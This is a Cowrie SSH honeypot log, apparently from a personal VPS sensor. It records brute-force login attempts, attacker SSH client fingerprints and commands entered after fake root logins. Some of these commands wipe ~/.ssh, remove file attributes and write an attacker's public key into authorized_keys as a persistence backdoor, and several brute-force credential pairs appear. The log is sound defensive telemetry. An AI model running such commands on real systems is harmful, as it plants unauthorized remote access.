{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:09.629610Z","src_ip":"212.227.235.229","session":"21009fac76ba"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:10.741065Z","src_ip":"212.227.235.229","session":"21009fac76ba"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:10.844432Z","src_ip":"212.227.235.229","session":"9b170b86f0a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59560,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2bb8eef6e4","protocol":"ssh","message":"New connection: 212.227.235.229:59560 (1.2.3.4:22) [session: 0f2bb8eef6e4]","sensor":"my-vps","timestamp":"2025-09-09T06:29:10.848925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:29:10.850888Z","src_ip":"212.227.235.229","session":"0f2bb8eef6e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:29:10.959547Z","src_ip":"212.227.235.229","session":"0f2bb8eef6e4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:11.399467Z","src_ip":"212.227.235.229","session":"0f2bb8eef6e4"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:11.511245Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:11.512311Z","src_ip":"212.227.235.229","session":"0f2bb8eef6e4"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":34770,"dst_ip":"1.2.3.4","dst_port":22,"session":"15eee412b40a","protocol":"ssh","message":"New connection: 157.20.207.165:34770 (1.2.3.4:22) [session: 15eee412b40a]","sensor":"my-vps","timestamp":"2025-09-09T06:29:12.773506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:29:12.774502Z","src_ip":"157.20.207.165","session":"15eee412b40a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:29:12.958686Z","src_ip":"157.20.207.165","session":"15eee412b40a"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"qwerty","message":"login attempt [localhost/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:13.732628Z","src_ip":"157.20.207.165","session":"15eee412b40a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:14.918971Z","src_ip":"157.20.207.165","session":"15eee412b40a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32786,"dst_ip":"1.2.3.4","dst_port":22,"session":"8013d00cbee1","protocol":"ssh","message":"New connection: 212.227.235.229:32786 (1.2.3.4:22) [session: 8013d00cbee1]","sensor":"my-vps","timestamp":"2025-09-09T06:29:16.124492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:16.125332Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:16.516052Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.login.success","username":"root","password":"Zaqxsw","message":"login attempt [root/Zaqxsw] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:17.883452Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:29:18.601869Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:29:18.602640Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:29:18.603418Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:19.311999Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:29:19.762954Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:29:19.763626Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:29:20.245093Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:20.246234Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33463,"dst_ip":"1.2.3.4","dst_port":22,"session":"2167fc397d2f","protocol":"ssh","message":"New connection: 212.227.235.229:33463 (1.2.3.4:22) [session: 2167fc397d2f]","sensor":"my-vps","timestamp":"2025-09-09T06:29:20.615265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:20.616188Z","src_ip":"212.227.235.229","session":"2167fc397d2f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:20.984937Z","src_ip":"212.227.235.229","session":"2167fc397d2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:22.511794Z","src_ip":"212.227.235.229","session":"2167fc397d2f"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:23.897436Z","src_ip":"212.227.235.229","session":"2167fc397d2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34055,"dst_ip":"1.2.3.4","dst_port":22,"session":"324445fd4087","protocol":"ssh","message":"New connection: 212.227.235.229:34055 (1.2.3.4:22) [session: 324445fd4087]","sensor":"my-vps","timestamp":"2025-09-09T06:29:24.272192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:24.273431Z","src_ip":"212.227.235.229","session":"324445fd4087"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:24.665749Z","src_ip":"212.227.235.229","session":"324445fd4087"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:26.218131Z","src_ip":"212.227.235.229","session":"324445fd4087"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:26.645383Z","src_ip":"212.227.235.229","session":"8013d00cbee1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:26.649115Z","src_ip":"212.227.235.229","session":"324445fd4087"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":32840,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e3234bf9dd7","protocol":"ssh","message":"New connection: 118.26.39.178:32840 (1.2.3.4:22) [session: 9e3234bf9dd7]","sensor":"my-vps","timestamp":"2025-09-09T06:29:33.607385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:29:33.608323Z","src_ip":"118.26.39.178","session":"9e3234bf9dd7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:29:33.811078Z","src_ip":"118.26.39.178","session":"9e3234bf9dd7"}
{"eventid":"cowrie.login.failed","username":"tony","password":"tony","message":"login attempt [tony/tony] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:34.668594Z","src_ip":"118.26.39.178","session":"9e3234bf9dd7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:35.874399Z","src_ip":"118.26.39.178","session":"9e3234bf9dd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36052,"dst_ip":"1.2.3.4","dst_port":22,"session":"94db4a1fbc82","protocol":"ssh","message":"New connection: 212.227.235.229:36052 (1.2.3.4:22) [session: 94db4a1fbc82]","sensor":"my-vps","timestamp":"2025-09-09T06:29:39.339094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:39.340221Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:39.761676Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.login.success","username":"root","password":"Und3rGr0und","message":"login attempt [root/Und3rGr0und] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:41.412620Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60889,"dst_ip":"1.2.3.4","dst_port":22,"session":"d709afc2e0a0","protocol":"ssh","message":"New connection: 212.227.235.229:60889 (1.2.3.4:22) [session: d709afc2e0a0]","sensor":"my-vps","timestamp":"2025-09-09T06:29:41.427356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:29:41.428162Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:29:41.515469Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.login.success","username":"root","password":"haslo123","message":"login attempt [root/haslo123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:41.909135Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:29:42.137689Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.138383Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.139570Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:29:42.212838Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.213526Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.214546Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
